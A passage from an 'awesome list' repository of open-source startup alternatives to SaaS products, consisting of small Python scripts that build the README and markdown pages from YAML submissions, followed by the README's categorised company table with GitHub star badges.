obj["company_name"] = appl(obj["company_name"]) arr.append(obj) return arr def get_all_categories(arr): categories = set() for obj in arr: categories.add(obj["category"]) return categories def create_website_directories(categories): for category in categories: if not os.path.exists(f"website/docs/{category}"): os.mkdir(f"website/docs/{category}") def generate_alternative_md(alts_names, alts_links): alt_md = "" for alt_link, alt_name in zip(alts_links, alts_names): alt_md += f"[{alt_name}]({alt_link}), " return alt_md.strip(", ") def create_markdown_for_companies(companies): for company in companies: file_name = "-".join(company["company_name"].split(" ")) with open( f"website/docs/{company['category']}/{file_name}.md", "w", encoding="utf-8" ) as file: file.write( markdown_template.format( company_name=company["company_name"], category=company["category"], gh_link=company["gh_link"], clean_gh_link=remove_github_com(company["gh_link"]), link=company["link"], clean_link=remove_https(company["link"]), description=company["description"], alts=generate_alternative_md( 
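                        # alts_names and alts_links are parallel lists taken from the YAML submission;
                        # they are rendered as a comma-separated string of "[name](link)" entries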
company["alts_names"], company["alts_links"] ), ) ) if __name__ == "__main__": companies = get_all_companies() categories = get_all_categories(companies) # creating categories for the website in the docs folder create_website_directories(categories) # creating markdown files for the companies create_markdown_for_companies(companies) File: create_yamls.py """ This script create yamls from README """ import yaml def read_readme(): with open("README.md", "r", encoding="utf-8") as f: all = f.readlines() table_start = "|Category|Company|Description|GitHub Stars|Alternative to|\n" table_end = "<!-- END STARTUP LIST -->\n" idx = all.index(table_start) idx_end = all.index(table_end) return all[idx + 2 : idx_end - 1] def parse_line(line: str): arr = line.split("|") category = arr[0] name = arr[1].split("]")[0][1:] website = arr[1].split("]")[1][1:-1] description = arr[2] github = arr[3].split(">")[0].split("href=")[1] alts = list(map(lambda x: x.strip().split("]")[0][1:], arr[4].split(","))) alts_links = list(map(lambda x: x.strip().split("](")[1][:-1], arr[4].split(","))) return dict( category=category, company_name=name, link=website, description=description, gh_link=github, alts_names=alts, alts_links=alts_links, ) if __name__ == "__main__": arr = read_readme() for line in arr: obj = parse_line(line) file_name = "_".join(obj["company_name"].split(" ")) with open(f"submissions/{file_name}.yaml", "w") as file: yaml.dump(obj, file, default_flow_style=False) File: build_readme.py """ This file builds README from YAML """ import yaml import os from add_company import add_new_company def parse_all_yamls(): arr = [] for filename in os.listdir("submissions"): if filename.endswith(".yaml"): with open(f"submissions/{filename}", "r") as file: obj = yaml.load(file, yaml.Loader) arr.append(obj) return arr def build_list(): arr = parse_all_yamls() for obj in arr: add_new_company(**obj) if __name__ == "__main__": build_list() File: add_company.py """ This script adds company directly to the list """ # import yaml def get_repo_from_url(url): """ Given a url, return the repository name. :param url: the url of the repo :return: The repo name. """ idx = url.find(".com/") return url[idx + len(".com/") :].strip("/") def create_alternatives_md(names, links): """ Create a markdown string of the form: [name1](link1), [name2](link2), ... 
:param names: A list of alternative names for the image :param links: A list of links to the alternative versions of the file :return: A string of the form: """ return ", ".join( (f"""[{name.strip()}]({link.strip()})""" for name, link in zip(names, links)) ) def create_shield_link(gh_link): return "https://img.shields.io/github/stars/{repo}?style=social".format( repo=get_repo_from_url(gh_link) ).strip() def create_new_line( category, company_name, description, link, gh_link, alts_names, alts_links ): return "{}|{}|{}|{}|{}|\n".format( category.strip(), f"[{company_name.strip()}]({link.strip()})", description.strip(), f'<a href={gh_link.strip()}><img src="{create_shield_link(gh_link)}" width=150/></a>', create_alternatives_md(alts_names, alts_links), ) def add_new_company( category, company_name, description, link, gh_link, alts_names, alts_links ): with open("README.md", "r", encoding="utf-8") as f: all = f.readlines() table_start = "|Category|Company|Description|GitHub Stars|Alternative to|\n" table_end = "<!-- END STARTUP LIST -->\n" idx = all.index(table_start) idx_end = all.index(table_end) find_name = lambda x: x[x.index("[") + 1 : x.index("]")].strip() find_cat = lambda x: x[: x.index("|")].strip() categories = [(find_cat(x), find_name(x)) for x in all[idx + 2 : idx_end - 1]] search_tup = (category.strip(), company_name.strip()) insert_idx = -1 for i, tup in enumerate(reversed(categories)): if search_tup == tup: return "This entry already exists" elif search_tup > tup: print(search_tup, tup) insert_idx = len(categories) - i break all.insert( insert_idx + idx + 2, create_new_line( category, company_name, description, link, gh_link, alts_names, alts_links ), ) # file_name = "_".join(company_name.split(" ")) # with open(f"submissions/{file_name}.yaml", "w") as file: # yaml.dump( # dict( # category=category, # company_name=company_name, # description=description, # link=link, # gh_link=gh_link, # alts_names=alts_names, # alts_links=alts_links, # ), # file, # default_flow_style=False, # ) with open("README.md", "w", encoding="utf-8") as f: f.writelines(all) return "ok, added!" def add_company_from_command_line(): count = 0 args = dict() while True: if count == 0: args["company_name"] = input("Enter the company name.\n(e.g Metabase)\n: ") print("-" * 100) count += 1 elif count == 1: args["category"] = input( "Enter category of the company. 
May be an existing or a new one.\n(e.g Business Intelligence)\n: " ) print("-" * 100) count += 1 elif count == 2: args["description"] = input( "Description of the company.\nKeep it short and simple (use one line)\n: " ) print("-" * 100) count += 1 elif count == 3: args["link"] = input( """Url to the company's website.\n(e.g https://www.metabase.com/)\n: """ ) print("-" * 100) count += 1 elif count == 4: args["gh_link"] = input( """"Url of the product's github repo.\n(e.g https://github.com/metabase/metabase)\n: """ ) print("-" * 100) count += 1 elif count == 5: args["alts_names"] = input( """Names of the company's well-known SaaS competitors.\n(e.g for Metabase: PowerBI, DataStudio, Tableau)\n: """ ).split(",") print("-" * 100) count += 1 elif count == 6: args["alts_links"] = input( "Links to the corresponding SaaS competitors.\n(e.g for Metabase: https://powerbi.microsoft.com/, https://datastudio.google.com/, https://www.tableau.com/)\n: " ).split(",") print("-" * 100) count += 1 else: result = add_new_company(**args) print(result) break if __name__ == "__main__": add_company_from_command_line() File: count.py def count_companies_in_readme(): with open('README.md', 'r', encoding='utf-8') as f: all = f.readlines() table_start = '|Category|Company|Description|GitHub Stars|Alternative to|\n' idx = all.index(table_start) return len(all[idx + 2: -1]) if __name__ == "__main__": print( f"Found companies in README: {count_companies_in_readme()}" )
# Awesome open-source alternatives to SaaS [![Awesome](https://cdn.rawgit.com/sindresorhus/awesome/d7305f38d29fed78fa85652e3a63e154dd8e8829/media/badge.svg)](https://github.com/sindresorhus/awesome) Awesome list of open-source startup alternatives to established SaaS products. Maintained by folks at [![Runa Capital](https://img.shields.io/static/v1?label=&message=%20&style=social&logoWidth=50&logo=data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAD8AAAAUCAYAAAA6NOUqAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAUpSURBVHgBtVhNUuNGFH7d/gkzmSrEKjGzGPkEmKpAUtkgdkBSBTkB4gSYE9icAHMCzAniqWI8kxXKJsXAVGFOgLLBZDWeRSapBNTpT/2EZCEbmcl8VV2S+v97f/1agnLi0qlZU1PldZLCIaUcIZSlSFhoU4p6+rsX3MrO81/evqTHY0kXVxebvwe6dHQ5pM8A8VCH/krNJllq6I4bEdmxUOTr0qy8OZ10w+tkiPq67JAhvklGGI4uv9L/jLHkr9cWtvWjmYt0Gkp5Sty4s93z3ycYda5LT5etRN2lLh7XRfsY8BPf07ok15jTpcZ9eok2i9usqL6YsYHQxJ88LR5o0hv3GoXwVAAzDy7CT0nTKpB6MeWm+jlClTw913zV6w0oH9L9bN7sgAlBOG2KhQPluLpU+b3JfT0y1kLcZvPYCJiznkn+iyflY2UWYx5qoJRoUVkeVjonftaY/sp3u0IGe3pcLDBB9tSzYo03kxfY2Hq0QSbTIqPB3phxdR4zw9+RG70g40pVioX7sy6OTM9wvbqwJ0RMXCnV+uvPL6uV7unuKOJA5c2Jf0Nq91790TuPJgPWdsloGGQcik13nAWl187qC+to8LzWEPn+ymJDCQEJhtomKZdnX5/tVD0vl9kWSTWGa0SbJoeny09ktI1NfqBPB6zgPRnzhyDBJyZvonroM4AfqFKtcnTi5ZkZMQIWo0gOxQhFhSY9Hvv8TAo0KybkARQKF8Ap0ibjBlbs86J8zG++oqIz2/0tNDUT/EqbOMsrr8+Gjpurte9fiOAfV0hRT58IilQ9muOR8HnTsACQhln3uA5tNYqj+kPwyLhSg8c4GBceddrcN7XW23iXkmpfHZ1emHptDRCKSEhYhQtTMslJAu4S6HN+tnu2T5MDSY6g4QBpUxy8IMxNroMiYMoz3N9mUm0eh71t8LgoZ0DdRTTOkF9dvDQEg2al+253JPGHgGNQFdykxjGPEuU9Ev/WJzzzPztkqHVD0I+Im5ZSIzdxTRrBsfLq7XLa1GWxPC2lToep5IdrjQc0A9M80GWPzDGVF0hglnL2hSWdS71xN/wUd8EuhJSiFUb8bOi+aqtAav7vj09nQHpUcIQLqVtzgiipWoghNBogjHYEpknTY4fiAIjn+pi+UJAlrn9YeK8TmIE+x6vpHn/8uDinkKaqlG+Hfq/cdAAch/7qt9qFlJN0rRSwBlLZmVQ9NOpyO/wXFydoeIPrPDKCsslYCnwa2ZxPJuPDHhvcjoC5z+/HOOraARnNpAGtCZ2m8kQx4A7a1PtrCwdXa/O5TFNnfyY7M/NlYY6yM7gPTA6lxXUd7gshYu+I4NElKEpv0Q5BREFun9vvXEN+/eps53l39DU0jPyBXBaZGxMu8vf+yjeNcUIIg16QcU+4T3KUS4AYzNjm7yjy+2T2BcF5if6oH1B8DGJv2zx/NAdl5vZpIHXVj/n+2mJDx4H6kBuEViCbgmTzanWxIxR1pM4JbgvFQeH2xgpEsGHyAEMMl6IRy/gUm24yaCIP32KSbsY4K9U/jW1+Yo6DZEMu8hGQ3+sLzCFJpLGpWxzBorUf6hLgnW4oKKBW6hBxB59EqTViemipSUaDbYp9fMAE0sEX1gATrvGYZKSPkiGPxzkUJzidaD1Bj4QWgk2FYAmmjz87Dw7IyAFGwOJN+hTHGpvfo+stNHjI7z4N3++jd4eMEAY8PqqPnvajySdx6ThW+dlHRwba94SweTEd3JHtCV8UxMu894SciMh79An4D/op5DM7HoOhAAAAAElFTkSuQmCC)](https://runacap.com) Also checkout our [ROSS index](https://runacap.com/ross-index/): fastest-growing open-source startups, every quarter. ## Criteria Open-source company is added to the list if: 1. Its product is strongly based on an open-source repo 2. It has a well-known closed-source competitor, solving a similar business problem 3. It is a private for-profit company, founded in the last 10 years 4. Its repo has 100+ stars on GitHub Things change really fast in the startup world, so this list can neither be fully complete, nor 100% up to date. Don't hesitate to [contribute](.github/CONTRIBUTING.md) and add new startups. Let's build the most comprehensive list together. Any questions or suggestions? Feel free to DM project maintainer [@garrrikkotua](https://twitter.com/garrrikkotua) -------------------- ## Startup List All startups in the list are sorted by categories and sorted in alphabetical order. If you click on the stars badge you will get to the product's repo. 
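If you prefer to script an addition, the repository ships a small helper (`add_company.py`) whose `add_new_company` function inserts a correctly formatted, alphabetically placed row into this table. A purely illustrative call, with made-up values, is shown below; see [CONTRIBUTING](.github/CONTRIBUTING.md) for the actual submission process.

```python
# illustrative only - the company, links and description below are made up
from add_company import add_new_company

add_new_company(
    category = "Business Intelligence",
    company_name = "ExampleBI",
    description = "Self-hosted dashboards and reporting",
    link = "https://example-bi.dev/",
    gh_link = "https://github.com/example/example-bi",
    alts_names = ["Tableau"],
    alts_links = ["https://www.tableau.com/"],
)
```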
**Have a good search!** <!-- BEGIN STARTUP LIST --> |Category|Company|Description|GitHub Stars|Alternative to| |:-------|:------|:----------|:----------:|:------------:| API Gateway|[Apache APISIX](https://github.com/apache/apisix)|Cloud Native API Gateway under the Apache Software Foundation|<a href=https://github.com/apache/apisix><img src="https://img.shields.io/github/stars/apache/apisix?style=social" width=150/></a>|[apigee](https://cloud.google.com/apigee) API Platform|[Firecamp](https://firecamp.dev/)|DX first open-source API devtool|<a href=https://github.com/firecamp-dev/firecamp><img src="https://img.shields.io/github/stars/firecamp-dev/firecamp?style=social" width=150/></a>|[Postman](https://www.postman.com/) API Platform|[Fusio](https://github.com/apioo/fusio)|API management platform|<a href=https://github.com/apioo/fusio><img src="https://img.shields.io/github/stars/apioo/fusio?style=social" width=150/></a>|[Postman](https://www.postman.com/) API Platform|[Hoppscotch](https://hoppscotch.io/)|API development ecosystem|<a href=https://github.com/hoppscotch/hoppscotch><img src="https://img.shields.io/github/stars/hoppscotch/hoppscotch?style=social" width=150/></a>|[Postman](https://www.postman.com/) API Platform|[Keploy](https://keploy.io/)|e2e Testing and Data Mocking|<a href=https://github.com/keploy/keploy><img src="https://img.shields.io/github/stars/keploy/keploy?style=social" width=150/></a>|[Smartbear](https://smartbear.com/), [Newman](https://learning.postman.com/docs/running-collections/using-newman-cli/command-line-integration-with-newman/) API Platform|[Step CI](https://stepci.com/)|API Testing and Monitoring|<a href=https://github.com/stepci/stepci><img src="https://img.shields.io/github/stars/stepci/stepci?style=social" width=150/></a>|[Checkly](https://www.checklyhq.com), [Postman](https://www.postman.com/) Auth & SSO|[BoxyHQ](https://boxyhq.com)|Enterprise Readiness made simple|<a href=https://github.com/boxyhq/jackson><img src="https://img.shields.io/github/stars/boxyhq/jackson?style=social" width=150/></a>|[Auth0](https://auth0.com/)| Auth & SSO|[Cerbos](https://cerbos.dev/)|Granular access control|<a href=https://github.com/cerbos/cerbos><img src="https://img.shields.io/github/stars/cerbos/cerbos?style=social" width=150/></a>|[Okta](https://okta.com/), [Auth0](https://auth0.com/) Auth & SSO|[FusionAuth](https://fusionauth.io/)|User authentication and session management framework|<a href=https://github.com/FusionAuth/fusionauth-containers><img src="https://img.shields.io/github/stars/FusionAuth/fusionauth-containers?style=social" width=150/></a>|[Okta](https://www.okta.com/), [Auth0](https://auth0.com/)| Auth & SSO|[Hanko](https://www.hanko.io)|Passkey-first authentication framework|<a href=https://github.com/teamhanko/hanko><img src="https://img.shields.io/github/stars/teamhanko/hanko?style=social" width=150/></a>|[Okta](https://okta.com/), [Auth0](https://auth0.com/) Auth & SSO|[Keycloak](https://www.cloud-iam.com/)|User authentication and session management framework|<a href=https://github.com/keycloak/keycloak><img src="https://img.shields.io/github/stars/keycloak/keycloak?style=social" width=150/></a>|[Okta](https://okta.com/), [Auth0](https://auth0.com/) Auth & SSO|[OPAL (Permit.io)](https://www.opal.ac/)|Authorization administration framework (Open Policy)|<a href=https://github.com/permitio/opal><img src="https://img.shields.io/github/stars/permitio/opal?style=social" width=150/></a>|[Okta](https://okta.com/), [Auth0](https://auth0.com/) Auth & 
SSO|[Ory](https://www.ory.sh/)|Identity platform|<a href=https://github.com/ory/kratos><img src="https://img.shields.io/github/stars/ory/kratos?style=social" width=150/></a>|[Okta](https://okta.com/), [Auth0](https://auth0.com/) Auth & SSO|[Oso](https://www.osohq.com/)|Authorization building framework|<a href=https://github.com/osohq/oso><img src="https://img.shields.io/github/stars/osohq/oso?style=social" width=150/></a>|[Okta](https://okta.com/), [Auth0](https://auth0.com/) Auth & SSO|[Supertokens](https://supertokens.io/)|User authentication and session management framework|<a href=https://github.com/supertokens/supertokens-core><img src="https://img.shields.io/github/stars/supertokens/supertokens-core?style=social" width=150/></a>|[Okta](https://okta.com/), [Auth0](https://auth0.com/) Auth & SSO|[Warrant](https://warrant.dev/)|Authorization and access control as a service|<a href=https://github.com/warrant-dev/warrant><img src="https://img.shields.io/github/stars/warrant-dev/warrant?style=social" width=150/></a>|[Okta](https://okta.com/), [Auth0](https://auth0.com/) Auth & SSO|[Zitadel](https://zitadel.com/)|User authentication and session management framework|<a href=https://github.com/zitadel/zitadel><img src="https://img.shields.io/github/stars/zitadel/zitadel?style=social" width=150/></a>|[Okta](https://okta.com/), [Auth0](https://auth0.com/)| Backend as a service|[AceBase](https://acebase.io/)|Backend server with REST APIs to manage core backend needs|<a href=https://github.com/appy-one/acebase><img src="https://img.shields.io/github/stars/appy-one/acebase?style=social" width=150/></a>|[Firebase](https://firebase.google.com/) Backend as a service|[Amplication](https://amplication.com/)|Backend server with REST and GraphQL APIs to manage core backend needs|<a href=https://github.com/amplication/amplication><img src="https://img.shields.io/github/stars/amplication/amplication?style=social" width=150/></a>|[Firebase](https://firebase.google.com/) Backend as a service|[Appwrite](https://appwrite.io/)|Backend server with REST APIs to manage core backend needs|<a href=https://github.com/appwrite/appwrite><img src="https://img.shields.io/github/stars/appwrite/appwrite?style=social" width=150/></a>|[Firebase](https://firebase.google.com/) Backend as a service|[CASE](https://case.app)|Lightweight Backend-as-a-Service with essential features|<a href=https://github.com/casejs/case><img src="https://img.shields.io/github/stars/casejs/case?style=social" width=150/></a>|[Firebase](https://firebase.google.com/)| Backend as a service|[Encore](https://encore.dev/)|Backend Development Engine for cloud-based apps, APIs, and distributed systems|<a href=https://github.com/encoredev/encore><img src="https://img.shields.io/github/stars/encoredev/encore?style=social" width=150/></a>|[Firebase](https://firebase.google.com/)| Backend as a service|[Kuzzle](https://kuzzle.io/kuzzle-backend/)|Backend server with REST APIs to manage core backend needs|<a href=https://github.com/kuzzleio/kuzzle><img src="https://img.shields.io/github/stars/kuzzleio/kuzzle?style=social" width=150/></a>|[Firebase](https://firebase.google.com/) Backend as a service|[Nhost](https://nhost.io/)|Backend server with GraphQL|<a href=https://github.com/nhost/nhost><img src="https://img.shields.io/github/stars/nhost/nhost?style=social" width=150/></a>|[Firebase](https://firebase.google.com/) Backend as a service|[PocketBase](https://pocketbase.io/)|Backend server with REST APIs to manage core backend needs|<a 
href=https://github.com/pocketbase/pocketbase><img src="https://img.shields.io/github/stars/pocketbase/pocketbase?style=social" width=150/></a>|[Firebase](https://firebase.google.com/)| Backend as a service|[Supabase](https://supabase.io/)|Backend server with REST APIs to manage core backend needs|<a href=https://github.com/supabase/supabase><img src="https://img.shields.io/github/stars/supabase/supabase?style=social" width=150/></a>|[Firebase](https://firebase.google.com/) Business Intelligence|[Metabase](https://www.metabase.com/)|Business intelligence software|<a href=https://github.com/metabase/metabase><img src="https://img.shields.io/github/stars/metabase/metabase?style=social" width=150/></a>|[Tableau](https://www.tableau.com/), [Power BI](https://powerbi.microsoft.com/), [DataStudio](https://datastudio.google.com/) Business Intelligence|[Preset](https://www.preset.io)|Modern BI platform powered by Apache Superset|<a href=https://github.com/apache/superset><img src="https://img.shields.io/github/stars/apache/superset?style=social" width=150/></a>|[PowerBI](https://powerbi.microsoft.com/), [Tableau](https://www.tableau.com/), [Mode Analytics](https://mode.com/)| CMS|[Builder](https://builder.io/)|Drag and drop page builder and CMS|<a href=https://github.com/builderio/builder><img src="https://img.shields.io/github/stars/builderio/builder?style=social" width=150/></a>|[Contentful](https://www.contentful.com/) CMS|[Concrete](https://www.concretecms.com/)|CMS for teams|<a href=https://github.com/concrete5/concrete5><img src="https://img.shields.io/github/stars/concrete5/concrete5?style=social" width=150/></a>|[Contentful](https://www.contentful.com/)| CMS|[Directus](https://directus.io/)|Data platform which wraps any database with an intuitive app|<a href=https://github.com/directus/directus><img src="https://img.shields.io/github/stars/directus/directus?style=social" width=150/></a>|[Contentful](https://www.contentful.com/) CMS|[Ghost](https://ghost.org/)|Headless Node.js publishing platform|<a href=https://github.com/tryghost/ghost><img src="https://img.shields.io/github/stars/tryghost/ghost?style=social" width=150/></a>|[Medium](https://www.medium.com/), [Substack](https://substack.com/) CMS|[Netlify CMS](https://www.netlifycms.org/)|Git-based CMS for static site generators|<a href=https://github.com/netlify/netlify-cms><img src="https://img.shields.io/github/stars/netlify/netlify-cms?style=social" width=150/></a>|[Contentful](https://www.contentful.com/) CMS|[Plasmic](https://plasmic.app/)|The headless page builder for singe-page frameworks|<a href=https://github.com/plasmicapp/plasmic><img src="https://img.shields.io/github/stars/plasmicapp/plasmic?style=social" width=150/></a>|[Contentful](https://www.contentful.com/)| CMS|[Strapi](https://strapi.io/)|Node.js Headless CMS to build customisable APIs|<a href=https://github.com/strapi/strapi><img src="https://img.shields.io/github/stars/strapi/strapi?style=social" width=150/></a>|[Contentful](https://www.contentful.com/) CMS|[Sulu](https://sulu.io/)|Modern Symfony based CMS|<a href=https://github.com/sulu/sulu><img src="https://img.shields.io/github/stars/sulu/sulu?style=social" width=150/></a>|[Contentful](https://www.contentful.com/) CMS|[Tina](https://tina.io/)|Visual editor for React websites|<a href=https://github.com/tinacms/tinacms><img src="https://img.shields.io/github/stars/tinacms/tinacms?style=social" width=150/></a>|[Contentful](https://www.contentful.com/) CMS|[Webiny](https://www.webiny.com/)|Enterprise serverless 
CMS|<a href=https://github.com/webiny/webiny-js><img src="https://img.shields.io/github/stars/webiny/webiny-js?style=social" width=150/></a>|[Contentful](https://www.contentful.com/) Cloud Data Warehouse|[Databend](https://databend.rs)|Elastic and Workload-Aware Modern Cloud Data Warehouse|<a href=https://github.com/datafuselabs/databend><img src="https://img.shields.io/github/stars/datafuselabs/databend?style=social" width=150/></a>|[Snowflake](https://www.snowflake.com)| Cloud Development Environment|[Gitpod](https://gitpod.io)|Automated provisioning of cloud development environments with multiple git providers & IDEs|<a href=https://github.com/gitpod-io/gitpod><img src="https://img.shields.io/github/stars/gitpod-io/gitpod?style=social" width=150/></a>|[Codespaces](https://github.com/features/codespaces)| Cloud Storage|[Minio](https://min.io/)|S3 compatible object storage|<a href=https://github.com/minio/minio><img src="https://img.shields.io/github/stars/minio/minio?style=social" width=150/></a>|[Amazon S3](https://aws.amazon.com/s3/)| Cloud Storage|[Storj](https://www.storj.io/)|Decentralized cloud storage|<a href=https://github.com/storj/storj><img src="https://img.shields.io/github/stars/storj/storj?style=social" width=150/></a>|[Amazon S3](https://aws.amazon.com/s3/)| Cloud-Native Application Protection Platform|[Deepfence ThreatMapper](https://github.com/deepfence/ThreatMapper)|Apache v2, powerful runtime vulnerability and compliance scanner for kubernetes, virtual machines, cloud and serverless.|<a href=https://github.com/deepfence/ThreatMapper><img src="https://img.shields.io/github/stars/deepfence/ThreatMapper?style=social" width=150/></a>|[Palo Alto Prisma](https://www.paloaltonetworks.com/prisma/cloud)| Communication|[Fonoster](https://fonoster.com/)|APIs for SMS, voice and video|<a href=https://github.com/fonoster/fonoster><img src="https://img.shields.io/github/stars/fonoster/fonoster?style=social" width=150/></a>|[Twilio](https://www.twilio.com/)| Communication|[Novu](https://novu.co/)|Components and APIs for email, sms, direct and push|<a href=https://github.com/novuhq/novu><img src="https://img.shields.io/github/stars/novuhq/novu?style=social" width=150/></a>|[Courier](https://www.courier.com/), [MagicBell](https://www.magicbell.com/), [Knock](https://knock.app/)| Community Platform|[crowd.dev](https://crowd.dev/)|Suite of community and data tools built to unlock community-led growth for your organization|<a href=https://github.com/CrowdDotDev/crowd.dev><img src="https://img.shields.io/github/stars/CrowdDotDev/crowd.dev?style=social" width=150/></a>|[Orbit](https://orbit.love/), [Common Room](https://www.commonroom.io/), [Commsor](https://www.commsor.com/)| Customer Data Platform|[Jitsu](https://jitsu.com/)|Fully-scriptable data ingestion engine for modern data teams|<a href=https://github.com/jitsucom/jitsu><img src="https://img.shields.io/github/stars/jitsucom/jitsu?style=social" width=150/></a>|[Segment](https://segment.com/) Customer Data Platform|[Rudderstack](https://rudderstack.com/)|Customer data platform for developers|<a href=https://github.com/rudderlabs/rudder-server><img src="https://img.shields.io/github/stars/rudderlabs/rudder-server?style=social" width=150/></a>|[Segment](https://segment.com/) Customer Data Platform|[Tracardi](http://www.tracardi.com/)|Customer Data Platform with Consumer Journey automation engine|<a href=https://github.com/tracardi/tracardi><img src="https://img.shields.io/github/stars/tracardi/tracardi?style=social" 
width=150/></a>|[Segment](https://segment.com/), [Zapier](https://zapier.com/) Customer Engagement|[Chaskiq](https://chaskiq.io/)|Live chat widget|<a href=https://github.com/chaskiq/chaskiq><img src="https://img.shields.io/github/stars/chaskiq/chaskiq?style=social" width=150/></a>|[Intercom](https://www.intercom.com/), [Zendesk](https://www.zendesk.com/) Customer Engagement|[Chatwoot](https://www.chatwoot.com/)|Live chat widget|<a href=https://github.com/chatwoot/chatwoot><img src="https://img.shields.io/github/stars/chatwoot/chatwoot?style=social" width=150/></a>|[Intercom](https://www.intercom.com/), [Zendesk](https://www.zendesk.com/) Customer Engagement|[Papercups](https://papercups.io/)|Live chat widget|<a href=https://github.com/papercups-io/papercups><img src="https://img.shields.io/github/stars/papercups-io/papercups?style=social" width=150/></a>|[Intercom](https://www.intercom.com/), [Zendesk](https://www.zendesk.com/) Cybersecurity|[CloudQuery](https://cloudquery.io/)|Assess, audit, and evaluate the configurations of your cloud assets.|<a href=https://github.com/cloudquery/cloudquery><img src="https://img.shields.io/github/stars/cloudquery/cloudquery?style=social" width=150/></a>|[AWS Config](https://aws.amazon.com/config/), [GCP Cloud Asset Inventory](https://cloud.google.com/asset-inventory), [AWS GuardDuty](https://aws.amazon.com/guardduty/)| Cybersecurity|[CrowdSec](http://crowdsec.net/)|Collaborative IPS able to analyze visitor behavior and to provide an adapted response to all kinds of attacks.|<a href=https://github.com/crowdsecurity/crowdsec><img src="https://img.shields.io/github/stars/crowdsecurity/crowdsec?style=social" width=150/></a>|[GreyNoise](https://www.greynoise.io/)| Cybersecurity|[Faraday](https://faradaysec.com)|Open Source Vulnerability Management and Orchestration Platform|<a href=https://github.com/infobyte/faraday><img src="https://img.shields.io/github/stars/infobyte/faraday?style=social" width=150/></a>|[Plextrac](https://plextrac.com//), [Vulcan](https://vulcan.io/)| Cybersecurity|[Firezone](https://www.firez.one/)|VPN Server & Firewall for teams|<a href=https://github.com/firezone/firezone><img src="https://img.shields.io/github/stars/firezone/firezone?style=social" width=150/></a>|[OpenVPN Access Server](https://openvpn.net/access-server/) Cybersecurity|[Gravitl](https://gravitl.com)|WireGuard virtual networking platform (VPN)|<a href=https://github.com/gravitl/netmaker><img src="https://img.shields.io/github/stars/gravitl/netmaker?style=social" width=150/></a>|[Tailscale](https://tailscale.com/), [OpenVPN](https://openvpn.net/)| Cybersecurity|[LunaTrace](https://www.lunasec.io/)|Dependency Vulnerability Scanner and SBOM Inventory|<a href=https://github.com/lunasec-io/lunasec><img src="https://img.shields.io/github/stars/lunasec-io/lunasec?style=social" width=150/></a>|[GitHub Dependabot](https://github.blog/2020-06-01-keep-all-your-packages-up-to-date-with-dependabot/), [Snyk.io](https://snyk.io/), [SonaType Nexus](https://www.sonatype.com/products/vulnerability-scanner)| Cybersecurity|[Matano](https://www.matano.dev)|Open source cloud-native security lake platform (SIEM alternative) for threat hunting, detection & response, and cybersecurity analytics at petabyte scale on AWS|<a href=https://github.com/matanolabs/matano><img src="https://img.shields.io/github/stars/matanolabs/matano?style=social" width=150/></a>|[Splunk](https://www.splunk.com/), [Elastic Cloud](https://www.elastic.co/elastic-stack/)| 
Cybersecurity|[NetBird](https://netbird.io)|Zero Configuration Mesh VPN for Business|<a href=https://github.com/netbirdio/netbird><img src="https://img.shields.io/github/stars/netbirdio/netbird?style=social" width=150/></a>|[Tailscale](https://tailscale.com/), [OpenVPN](https://openvpn.net/)| Cybersecurity|[Nuclei](https://nuclei.projectdiscovery.io/)|Vulnerability scanner based on simple YAML based DSL|<a href=https://github.com/projectdiscovery/nuclei><img src="https://img.shields.io/github/stars/projectdiscovery/nuclei?style=social" width=150/></a>|[Tenable Nessus](https://www.tenable.com/products/nessus)| Design|[Modulz](https://www.modulz.app/)|Code-based tool for designing and prototyping|<a href=https://github.com/radix-ui/primitives><img src="https://img.shields.io/github/stars/radix-ui/primitives?style=social" width=150/></a>|[Figma](https://www.figma.com/)| Design|[Penpot](https://penpot.app/)|Design & prototyping platform|<a href=https://github.com/penpot/penpot><img src="https://img.shields.io/github/stars/penpot/penpot?style=social" width=150/></a>|[Figma](https://www.figma.com/)| Digital Signature|[DocuSeal](https://docuseal.co)|Digital Signing Infrastructure|<a href=https://github.com/docusealco/docuseal><img src="https://img.shields.io/github/stars/docusealco/docuseal?style=social" width=150/></a>|[DocuSign](https://www.docusign.com/)| Digital Signature|[Documenso](https://documenso.com)|Digital Signing Infrastructure|<a href=https://github.com/documenso/documenso><img src="https://img.shields.io/github/stars/documenso/documenso?style=social" width=150/></a>|[DocuSign](https://www.docusign.com/)| Digital Signature|[LibreSign](https://libresign.coop/)|Digital document signer|<a href=https://github.com/LibreSign/libresign><img src="https://img.shields.io/github/stars/libresign/libresign?style=social" width=150/></a>|[DocuSign](https://www.docusign.com/) E-commerce|[Bagisto](https://bagisto.com/en/)|Headless e-commerce platform|<a href=https://github.com/bagisto/bagisto><img src="https://img.shields.io/github/stars/bagisto/bagisto?style=social" width=150/></a>|[Shopify](https://www.shopify.com/), [Ecwid](https://www.ecwid.com/) E-commerce|[Medusa](https://www.medusajs.com/)|Headless e-commerce platform|<a href=https://github.com/medusajs/medusa><img src="https://img.shields.io/github/stars/medusajs/medusa?style=social" width=150/></a>|[Shopify](https://www.shopify.com/), [Ecwid](https://www.ecwid.com/) E-commerce|[Saleor](https://saleor.io/)|Headless e-commerce platform|<a href=https://github.com/saleor/saleor><img src="https://img.shields.io/github/stars/saleor/saleor?style=social" width=150/></a>|[Shopify](https://www.shopify.com/), [Ecwid](https://www.ecwid.com/) E-commerce|[Shuup](https://shuup.com)|Headless e-commerce platform|<a href=https://github.com/shuup/shuup><img src="https://img.shields.io/github/stars/shuup/shuup?style=social" width=150/></a>|[Shopify](https://www.shopify.com/), [Ecwid](https://www.ecwid.com/) E-commerce|[Sylius](https://sylius.com/)|Headless e-commerce platform|<a href=https://github.com/sylius/sylius><img src="https://img.shields.io/github/stars/sylius/sylius?style=social" width=150/></a>|[Shopify](https://www.shopify.com/), [Ecwid](https://www.ecwid.com/) E-commerce|[Vendure](https://www.vendure.io/)|Headless e-commerce platform|<a href=https://github.com/vendure-ecommerce/vendure><img src="https://img.shields.io/github/stars/vendure-ecommerce/vendure?style=social" width=150/></a>|[Shopify](https://www.shopify.com/), 
